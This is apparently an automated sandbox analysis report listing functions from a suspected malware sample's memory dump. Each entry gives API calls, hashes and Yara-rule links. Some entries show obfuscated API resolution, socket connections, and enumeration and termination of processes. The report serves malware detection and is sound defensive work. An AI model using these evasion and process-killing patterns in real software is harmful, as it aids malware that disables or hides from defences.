String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
API String ID: 4000879885-2292685684
Opcode ID: d269b513572a26bb42c62660514d23dd216e8ca1fb1cfa6b079dac43a0f6d26f
Instruction ID: 6ce4d08748e08b77b227e34bb7f3f73b2ca98cde28a8de05c237c98181f75683
Opcode Fuzzy Hash: d269b513572a26bb42c62660514d23dd216e8ca1fb1cfa6b079dac43a0f6d26f
Instruction Fuzzy Hash: CBC04C1299E530292584325C3947CEB424E8DA5721356066FB511A52D26D895D8302FE

Uniqueness

Uniqueness Score: -1.00%

Function 0041D156, Relevance: 3.1, APIs: 2, Instructions: 66COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D1BB
__Thrd_sleep.LIBCPMT ref: 0041D1E9

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Thrd_sleepUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 2189147043-0
Opcode ID: 47a8ddcce70c8895908d88603f27a71261166a999d0af40037d1de5ea9b93a1c
Instruction ID: e3f51021e9b5944bc9c68dc0f59b277c80080e10fcff91de3f204057302c160c
Opcode Fuzzy Hash: 47a8ddcce70c8895908d88603f27a71261166a999d0af40037d1de5ea9b93a1c
Instruction Fuzzy Hash: 93112771504310ABC710EF258C81B5B7ADDEFCA754F04472EF548AA151D674998187D9

Uniqueness

Uniqueness Score: -1.00%

Function 006A1EE1, Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,006A2250,00000006,FlsSetValue,00714538,00714540,00000000,00000364,?,006A0C90,00000000), ref: 006A1F41
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 006A1F4E

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID:
API String ID: 2279764990-0
Opcode ID: 1356ba27c720466bb6536fe425c23085d035f2f225548062430c10377e671944
Instruction ID: f85128c89046432f898d25ec1b3fee31d021e51a4d2e888dbe690d9180f6116e
Opcode Fuzzy Hash: 1356ba27c720466bb6536fe425c23085d035f2f225548062430c10377e671944
Instruction Fuzzy Hash: C011E773A011649F9B21AE19DC4099A77D7AB83370B564221FD14AF254D734DC428BD0

Uniqueness

Uniqueness Score: -1.00%

Function 00421E0C, Relevance: 3.0, APIs: 2, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00421E11
new.LIBCMT ref: 00421E2E

Part of subcall function 00421DB9: __EH_prolog.LIBCMT ref: 00421DBE
Part of subcall function 00421DB9: __Getctype.LIBCPMT ref: 00421DE4

Part of subcall function 0042137B: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 004213A3
Part of subcall function 0042137B: std::_Lockit::~_Lockit.LIBCPMT ref: 0042142F

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prologstd::_$GetctypeLocinfo::_Locinfo_dtorLockitLockit::~_
String ID:
API String ID: 4122330132-0
Opcode ID: 9b26bed426c027569cdb9a6d7965f8982457c78798ad9c8182bb9e243fef2874
Instruction ID: fcd44e31cc3cbc786fd0eca0a4cff6963f9cb1f1a77067bb6eb4268bfa44bab1
Opcode Fuzzy Hash: 9b26bed426c027569cdb9a6d7965f8982457c78798ad9c8182bb9e243fef2874
Instruction Fuzzy Hash: AE01A1B1A00218DBDB10EFA9E881ADEBB74FF64720F60466FE415A7291C7740B01C794

Uniqueness

Uniqueness Score: -1.00%

Function 0041510B, Relevance: 3.0, APIs: 2, Instructions: 48COMMON

Download Yara Rule

APIs

CreateIoCompletionPort.KERNELBASE(?,?,00000000,00000000), ref: 0041511E
GetLastError.KERNEL32 ref: 00415128

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CompletionCreateErrorLastPort
String ID:
API String ID: 826170474-0
Opcode ID: 1c7ee15dbfd1503bf6760d0490cb15ff35d498051381d9f937e43fc4ee977736
Instruction ID: c1263357b05867d2733bc16997838d1f3c7cee8441f252a4f277bc4f25832a2c
Opcode Fuzzy Hash: 1c7ee15dbfd1503bf6760d0490cb15ff35d498051381d9f937e43fc4ee977736
Instruction Fuzzy Hash: 73018471D01508BF8B01DFA9984499FBFBAEE86354B24407AFC04D7301D6758E058BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00697DEC, Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00697E0D

Part of subcall function 00697D9E: RtlAllocateHeap.NTDLL(00000000,00000003,00000003,?,006A1A7D,00001000,00000000,?,?,?,0069753B,00000000,00000000,00000000,?,?), ref: 00697DD0

RtlReAllocateHeap.NTDLL(00000000,?,?,00000004,00000000,?,0069A07A,?,00000004,00000000,?,?,?,0069C8F9,?,00000000), ref: 00697E49

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AllocateHeap$_free
String ID:
API String ID: 1482568997-0
Opcode ID: 04a8543df98c1afc54205b475926a2bbd36f3b140ae5f5a500211b3eeb4583ca
Instruction ID: f8535ded6fffde4913784612010553652d5cd73433143d5cc38e89247a84afd7
Opcode Fuzzy Hash: 04a8543df98c1afc54205b475926a2bbd36f3b140ae5f5a500211b3eeb4583ca
Instruction Fuzzy Hash: 51F0963252961666CF212B259C02BBB275F9FD1B71B25409EF8199AE91EB20CC1291A8

Uniqueness

Uniqueness Score: -1.00%

Function 0040F4DA, Relevance: 3.0, APIs: 2, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e7cbe3b3945489250c6ffed3a06d5de9098a946e2ae5d11fe28fa84d0b631fe
Instruction ID: e32795fc2373a1baa30d598f7e8e4a4094cc23e70d160b716c3c012fa2b5d7a1
Opcode Fuzzy Hash: 6e7cbe3b3945489250c6ffed3a06d5de9098a946e2ae5d11fe28fa84d0b631fe
Instruction Fuzzy Hash: D3F0247020020459DB6CDE38CC5466A37895B01324B204B3FF82EC65C2DB74D98C8208

Uniqueness

Uniqueness Score: -1.00%

Function 0041429F, Relevance: 3.0, APIs: 2, Instructions: 28COMMON

Download Yara Rule

APIs

__Thrd_start.LIBCPMT ref: 004142AE

Part of subcall function 0057A79A: std::_Throw_Cpp_error.LIBCPMT ref: 0057A7C1

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Cpp_errorThrd_startThrow_std::_
String ID:
API String ID: 1816819587-0
Opcode ID: 73882538f6bdff0b6b471165b4ed91e7b7221f71a5e7dea40f44ed8922e14ddf
Instruction ID: 1711f41c4229daadd3af8df59cb51dedd6112632dc40eb4914f8a2173c77e902
Opcode Fuzzy Hash: 73882538f6bdff0b6b471165b4ed91e7b7221f71a5e7dea40f44ed8922e14ddf
Instruction Fuzzy Hash: D3E0D8311002517ADA2D1221AC079EB7F84DBC0760B14807FF54A50452DA6DDCD16649

Uniqueness

Uniqueness Score: -1.00%

Function 0041F53B, Relevance: 3.0, APIs: 2, Instructions: 18COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041F540
new.LIBCMT ref: 0041F549

Part of subcall function 0041F572: __EH_prolog.LIBCMT ref: 0041F577

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 72f65d3733cd1816bf3482122c7b8fc5b7e0524313d44bd45335048aa942ff10
Instruction ID: aaa59f0a5d1e18cd059850cc56492db9f86fd8dc6bf88d88e6f0664946d78b44
Opcode Fuzzy Hash: 72f65d3733cd1816bf3482122c7b8fc5b7e0524313d44bd45335048aa942ff10
Instruction Fuzzy Hash: DBE08670940605ABEB08AF94D8167AD7B66EB00310F10436DB425561D1DB740F408744

Uniqueness

Uniqueness Score: -1.00%

Function 0041669D, Relevance: 1.6, APIs: 1, Instructions: 86COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004166A2

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: fc1b44fa2652a77515b32c56ff951fb98f229cd1dd70937fbea40c6ec28d829d
Instruction ID: 8d787526a4bf0b24d3d87e9b2ccb446cbac1e89f66f431e90f9ce25a14d51f2a
Opcode Fuzzy Hash: fc1b44fa2652a77515b32c56ff951fb98f229cd1dd70937fbea40c6ec28d829d
Instruction Fuzzy Hash: E131CF32900609DFCB01DF68C8406EFBBB1AF45324F11821EF8796B291C779AA46CB94

Uniqueness

Uniqueness Score: -1.00%

Function 004123B2, Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004123B7

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 512881a1ece207372955a4204b135b8466ef0a5d4e3e70ea8eb73ce178d58f02
Instruction ID: e8f8d7a5964f2b445040bfcb06dc4bdd39b919295e06a621ade6c61c4dbfe788
Opcode Fuzzy Hash: 512881a1ece207372955a4204b135b8466ef0a5d4e3e70ea8eb73ce178d58f02
Instruction Fuzzy Hash: CC210571A003159BDB24DF68CA507EEB7B5EB40720F20062EE961E73C2C3B46A9587D9

Uniqueness

Uniqueness Score: -1.00%

Function 0041EED8, Relevance: 1.6, APIs: 1, Instructions: 79COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041EEDD

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 4d15fca86e0c5606598e5f9bd5bddd8da3e85dee407018ee59cb783fa558d344
Instruction ID: fe63a4850e38163b597c6e3990eaf3730cf34859dc978af65c5c2bfcf8551836
Opcode Fuzzy Hash: 4d15fca86e0c5606598e5f9bd5bddd8da3e85dee407018ee59cb783fa558d344
Instruction Fuzzy Hash: 5931E0B1904209DFCB14DF98C5859DEBBF8FF09320F20866EE459E7291D7349A44CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041EA75, Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041EA7A

Part of subcall function 0041EED8: __EH_prolog.LIBCMT ref: 0041EEDD

Part of subcall function 0041B618: __EH_prolog.LIBCMT ref: 0041B61D

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 4bfb908e6eaf34015ecca621b83a2dda6df74b2048ffbd402ca78b6208732579
Instruction ID: 5b0730db0a22c4c3ed54843ca7c9fbf6e0b11cb2f2d9f97c1fe575d98ca53840
Opcode Fuzzy Hash: 4bfb908e6eaf34015ecca621b83a2dda6df74b2048ffbd402ca78b6208732579
Instruction Fuzzy Hash: B1318B71900708DFDB14EF75C445BEEFBA5EF54304F00881EE5AA97281CB346A44CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0041496B, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?,?,?,00000000,006B1A60,000000FF,?,Service already exists.), ref: 004149CB

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CriticalDeleteSection
String ID:
API String ID: 166494926-0
Opcode ID: 189e7d347e9017f12ec0a5919b57040333f7d146fc612c05d702a62bceb6a313
Instruction ID: 5db7d3939c8b5eaf97030123963db2762d5fa0df23491b415197f97b442585dc
Opcode Fuzzy Hash: 189e7d347e9017f12ec0a5919b57040333f7d146fc612c05d702a62bceb6a313
Instruction Fuzzy Hash: 4B11CBB2601B10DFC724CF59D444B9BB7A8EF49B20F11065EE916AB790CB38AC408BC8

Uniqueness

Uniqueness Score: -1.00%

Function 0069349F, Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

__alldvrm.LIBCMT ref: 006934F4

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __alldvrm
String ID:
API String ID: 65215352-0
Opcode ID: ee8a5464343998b39adc42ec586e8e622da358949555639e1c8f2cec3686b75f
Instruction ID: 404ebd523b968c54decdb65b4f107b2e30f69084eb1c9963fbb7f85aa26ce8f1
Opcode Fuzzy Hash: ee8a5464343998b39adc42ec586e8e622da358949555639e1c8f2cec3686b75f
Instruction Fuzzy Hash: 3801D471910318BFDF64EF65C842BAEB7EEEB41724F12866DE8059BB00D2759E808B54

Uniqueness

Uniqueness Score: -1.00%

Function 005C5040, Relevance: 1.5, APIs: 1, Instructions: 42threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(00000000,00000000,?,?,?,?,?,?,004ABB35), ref: 005C50A3

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 8124d39038c3e9bcf075604769b870508649d432f5cc79964c3eb0d7b937d644
Instruction ID: b560e6fb1e654ddaea85a8769d39945d8cebf43512de28bcb0c0168283f6befe
Opcode Fuzzy Hash: 8124d39038c3e9bcf075604769b870508649d432f5cc79964c3eb0d7b937d644
Instruction Fuzzy Hash: 6DF0B4717001201AD920B3B6AC1BFAE2659DB90724F05403EF40FAB6D6DEFC698685AD

Uniqueness

Uniqueness Score: -1.00%

Function 0041D1F6, Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041D1FB

Part of subcall function 0041F0C9: __EH_prolog.LIBCMT ref: 0041F0CE

Part of subcall function 0041EA75: __EH_prolog.LIBCMT ref: 0041EA7A

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: d2396fcb84d8ff267c7d74de8419c52d6c8e67c2b90bb5a6989fc1192a853abb
Instruction ID: 720c8abf6b3a623fc18666556a0d67ae755b3cc3777e772e428a5fe24dc0e369
Opcode Fuzzy Hash: d2396fcb84d8ff267c7d74de8419c52d6c8e67c2b90bb5a6989fc1192a853abb
Instruction Fuzzy Hash: 2F017872A01108EFDB04EFA9D905AEEFBB9FF48324F10815EE401A3291CB756B45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 006973D2, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,006A0BEC,00000001,00000364,?,0068BA4F,0077A468,00000010), ref: 00697413

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4f877a8d87a716c2326b090c0abd7a7843dab70259e51459aa8e06c997e83765
Instruction ID: 1f6a5d01b21c0fd894ec79396150fcf336aa37edfcf09a0212d865130efe5741
Opcode Fuzzy Hash: 4f877a8d87a716c2326b090c0abd7a7843dab70259e51459aa8e06c997e83765
Instruction Fuzzy Hash: 05F0E03162952467DF216A219C05F973F9FAF50BA0B158421FD05DAE41DB20DC1245E0

Uniqueness

Uniqueness Score: -1.00%

Function 0041B618, Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041B61D

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: eaa27ee7ce3b9304f5456c7da0364159dae65053c83cd0c7620695ef1e572bd7
Instruction ID: 4b0a7df359b27d7deb2a5b517f0b8da2aa001c86551ddee930004eb691111233
Opcode Fuzzy Hash: eaa27ee7ce3b9304f5456c7da0364159dae65053c83cd0c7620695ef1e572bd7
Instruction Fuzzy Hash: B0F049F191121AABD7109F59D9418AAFFA9FF64760B10822BB51893250D7715A10CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 00697D9E, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000003,00000003,?,006A1A7D,00001000,00000000,?,?,?,0069753B,00000000,00000000,00000000,?,?), ref: 00697DD0

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 6cfb262724f3d3dc114560e7e6d4e7d7c6529226fdafa8203e455a43d015d619
Instruction ID: 02dbf130daba63d49ff466732518eb3c32f2a04780a255b5738294c68bc289d6
Opcode Fuzzy Hash: 6cfb262724f3d3dc114560e7e6d4e7d7c6529226fdafa8203e455a43d015d619
Instruction Fuzzy Hash: 66E02B311296156EDF313A255D00BFB3B6FDF813B0F090122EC0996EC1CB10CC0485E8

Uniqueness

Uniqueness Score: -1.00%

Function 004A8E57, Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

Part of subcall function 00422C2A: new.LIBCMT ref: 00422C60
Part of subcall function 00422C2A: std::locale::_Init.LIBCPMT ref: 00422C6A

Part of subcall function 004A9AFE: __EH_prolog.LIBCMT ref: 004A9B03

std::ios_base::_Addstd.LIBCPMT ref: 004A8E96

Part of subcall function 00422B03: __EH_prolog.LIBCMT ref: 00422B08
Part of subcall function 00422B03: __CxxThrowException@8.LIBVCRUNTIME ref: 00422B2E

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$AddstdException@8InitThrowstd::ios_base::_std::locale::_
String ID:
API String ID: 2564750599-0
Opcode ID: 6f5522c1c9eeb18aaa8e955b6a7881d6c507de60ff235f494b4ea693d3cb3b0d
Instruction ID: e8c6b4643be6486736da30038d08bc6f4130dc9442f5279e29b39069d556d153
Opcode Fuzzy Hash: 6f5522c1c9eeb18aaa8e955b6a7881d6c507de60ff235f494b4ea693d3cb3b0d
Instruction Fuzzy Hash: 73F0A7312043546BE724BA66A449B5B7BD8EB11334F10440FF58647B82DAF9F840C794

Uniqueness

Uniqueness Score: -1.00%

Function 004A9AFE, Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004A9B03

Part of subcall function 00422BB8: __EH_prolog.LIBCMT ref: 00422BBD

Part of subcall function 004AA0C8: __EH_prolog.LIBCMT ref: 004AA0CD
Part of subcall function 004AA0C8: std::_Lockit::_Lockit.LIBCPMT ref: 004AA0DC
Part of subcall function 004AA0C8: std::locale::_Getfacet.LIBCPMT ref: 004AA0FC
Part of subcall function 004AA0C8: std::_Lockit::~_Lockit.LIBCPMT ref: 004AA156

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$Lockitstd::_$GetfacetLockit::_Lockit::~_std::locale::_
String ID:
API String ID: 3055501177-0
Opcode ID: 00e794a8eb88abcc8a9b8efc2fa15adb26b1e8153557c9fb41993d65153df20b
Instruction ID: 4b4e7e136601db2bbeaaab1686e08f6e214523d7111080314e64cf060046e2f1
Opcode Fuzzy Hash: 00e794a8eb88abcc8a9b8efc2fa15adb26b1e8153557c9fb41993d65153df20b
Instruction Fuzzy Hash: 47E03771940118EBDB14EFA4E905AAEBB69EF54311F10465EF40593191DB345F44CAA4

Uniqueness

Uniqueness Score: -1.00%

Function 00415A24, Relevance: 1.5, APIs: 1, Instructions: 24networkCOMMON

Download Yara Rule

APIs

connect.WS2_32(?,?,?), ref: 00415A44

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: connect
String ID:
API String ID: 1959786783-0
Opcode ID: 3fefd9f540633eb30b3698a76202bb7f5cd4ec7936f625b77c56b3b960efcf26
Instruction ID: 2acf2c692f55a5b861b11f6723e36befb60b0f762cc8b4f079354badfdef04c0
Opcode Fuzzy Hash: 3fefd9f540633eb30b3698a76202bb7f5cd4ec7936f625b77c56b3b960efcf26
Instruction Fuzzy Hash: AEE08632640914A74A102AB86C918F937598F847797008316BB3D4A3D0CA34DD504294

Uniqueness

Uniqueness Score: -1.00%

Function 0041EDE6, Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041EDEB

Part of subcall function 004142E3: std::_Cnd_initX.LIBCPMT ref: 004142E9
Part of subcall function 004142E3: __Cnd_signal.LIBCPMT ref: 004142F5
Part of subcall function 004142E3: std::_Cnd_initX.LIBCPMT ref: 0041430A

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Cnd_initstd::_$Cnd_signalH_prolog
String ID:
API String ID: 3262714529-0
Opcode ID: bf91094cce2af99d57b9192d901cbda98ef3c8e51d643aae989a4339f1248000
Instruction ID: 86a23be5b3e70d79fa78b63793554b73666ca2c1f11df9004a0eab4831b94d5d
Opcode Fuzzy Hash: bf91094cce2af99d57b9192d901cbda98ef3c8e51d643aae989a4339f1248000
Instruction Fuzzy Hash: EAE09271814315DBEB14AF5494067DE77B4EF04336F20068EF0646A181CB7516418798

Uniqueness

Uniqueness Score: -1.00%

Function 00410899, Relevance: 1.5, APIs: 1, Instructions: 19networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000002,00000002), ref: 004108BC

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 22ca85fd3f06662cfec0d26b4cb1330711db51ac9713fbe80ff21241f2df7216
Instruction ID: ae04e894da3d2b422cc704ea447363aa3b6b793d4aa3a88de296f6bbb0fb7005
Opcode Fuzzy Hash: 22ca85fd3f06662cfec0d26b4cb1330711db51ac9713fbe80ff21241f2df7216
Instruction Fuzzy Hash: CAD02B319252144FD710F63C6C0E271339CD305331F1002769CB9C11C0FD08461649D5

Uniqueness

Uniqueness Score: -1.00%

Function 00680E81, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

__onexit.LIBCMT ref: 00680E87

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit
String ID:
API String ID: 1448380652-0
Opcode ID: d78d9142898b9c98952a14e3dedbcd9244443e9bdde8ff525791cf48f29bf47b
Instruction ID: 8358e273cd62a1121eec4a30b2b28f7e07238832b21c82d0dfd304000e4553e0
Opcode Fuzzy Hash: d78d9142898b9c98952a14e3dedbcd9244443e9bdde8ff525791cf48f29bf47b
Instruction Fuzzy Hash: E3B0123109890E7A7E547DF5EC098773B5EC611A607400B26FC0DC40F1DD12A4544185

Uniqueness

Uniqueness Score: -1.00%

Function 00414312, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 0041431C

Part of subcall function 0057ABC5: __Thrd_current.LIBCPMT ref: 0057ABD7
Part of subcall function 0057ABC5: __Mtx_unlock.LIBCPMT ref: 0057AC23
Part of subcall function 0057ABC5: __Cnd_broadcast.LIBCPMT ref: 0057AC2E

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Cnd_broadcastCnd_do_broadcast_at_thread_exitMtx_unlockThrd_current
String ID:
API String ID: 3770271663-0
Opcode ID: 67da1aa62ae980355478264cf44e6315053687dbe5315709f50b16d5166c244b
Instruction ID: 405b687a562a499c2f31559f489e5af26c2a113d013579d73062ad7a19564b07
Opcode Fuzzy Hash: 67da1aa62ae980355478264cf44e6315053687dbe5315709f50b16d5166c244b
Instruction Fuzzy Hash: BDC092322582088F9340EBB8E489C2A7BE9AF957107008075B9098B621DE31BC14DA9A

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004F2AA7, Relevance: 132.9, APIs: 3, Strings: 69, Instructions: 6899libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 004F7E93
GetProcAddress.KERNEL32(00000000,?,?,?,?,?,0000006E,00000065,00000070,0000006F,?,?,?,?,?,0000003D), ref: 004F7EA0
GetProcAddress.KERNEL32(0042A244,?,?,?,?,?,0000006E,00000065,00000070,0000006F,?,?,?,?,?,0000003D), ref: 004F7F82

Strings

>, xrefs: 004F65EA
H, xrefs: 004F5FAC
x, xrefs: 004F3F7E
F, xrefs: 004F49DE
:, xrefs: 004F2EB1
B, xrefs: 004F2F31
-, xrefs: 004F507A
, xrefs: 004F4304
n, xrefs: 004F387C
e, xrefs: 004F3909
u, xrefs: 004F3EB2
|, xrefs: 004F4A54
k, xrefs: 004F4C06
*, xrefs: 004F3914
q, xrefs: 004F41E6
G, xrefs: 004F4B34
*, xrefs: 004F3FE9
], xrefs: 004F366B
^, xrefs: 004F3DD6
c, xrefs: 004F7DBE
S, xrefs: 004F43D5
&, xrefs: 004F4329
O, xrefs: 004F3382
Z, xrefs: 004F7073
M, xrefs: 004F4EE1
L, xrefs: 004F44A0
T, xrefs: 004F64AE
", xrefs: 004F628E
m, xrefs: 004F35EB
V, xrefs: 004F4D15
|, xrefs: 004F443F
K, xrefs: 004F3287
j, xrefs: 004F4A5F
#, xrefs: 004F3FFF
F, xrefs: 004F3F89
P, xrefs: 004F3188
$, xrefs: 004F3368
", xrefs: 004F4185
~, xrefs: 004F3685
$, xrefs: 004F31F5
%, xrefs: 004F405F
f, xrefs: 004F3109
L, xrefs: 004F327C
&, xrefs: 004F4B4A
V, xrefs: 004F4079
x, xrefs: 004F2DB4
A, xrefs: 004F40E3
a, xrefs: 004F33E1
O, xrefs: 004F3D6C
<, xrefs: 004F4A49
9, xrefs: 004F7D8E
j, xrefs: 004F309C
&, xrefs: 004F3CFE
L, xrefs: 004F7D86
u, xrefs: 004F2ADD
_, xrefs: 004F7DC6
G, xrefs: 004F2E33
U, xrefs: 004F4C11
\, xrefs: 004F3262
+, xrefs: 004F349C
%, xrefs: 004F391F
@, xrefs: 004F35D1
J, xrefs: 004F40D8
y, xrefs: 004F3EA7
8, xrefs: 004F4ED6
9, xrefs: 004F2B53
5, xrefs: 004F65E2
[, xrefs: 004F41F1
,, xrefs: 004F49E9

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AddressProc$LibraryLoad
String ID: $"$"$#$$$$$%$%$&$&$&$*$*$+$,$-$5$8$9$9$:$<$>$@$A$B$F$F$G$G$H$J$K$L$L$L$M$O$O$P$S$T$U$V$V$Z$[$\$]$^$_$a$c$e$f$j$j$k$m$n$q$u$u$x$x$y$|$|$~
API String ID: 2238633743-870878446
Opcode ID: 95440dd44cc0fc8e6b58b97573b950fd75d7b32fa83f4d37b1d28c9fcbe69483
Instruction ID: a1b9d0a6092231459a0a291868cf37ce2bd6bb804399743b1d4ecb0a163a8f6d
Opcode Fuzzy Hash: 95440dd44cc0fc8e6b58b97573b950fd75d7b32fa83f4d37b1d28c9fcbe69483
Instruction Fuzzy Hash: 1CD35B315087809FD729DF78C9856EAFBE0FF89304F00462FD5899B252DB38A549CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0045624F, Relevance: 12.1, APIs: 8, Instructions: 70processCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00456254
CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00456275
Process32FirstW.KERNEL32(00000000,0000022C), ref: 0045628F
OpenProcess.KERNEL32(00000001,00000000,?,0000007F), ref: 004562C1
TerminateProcess.KERNEL32(00000000,00000009), ref: 004562D0
CloseHandle.KERNEL32(00000000), ref: 004562D7
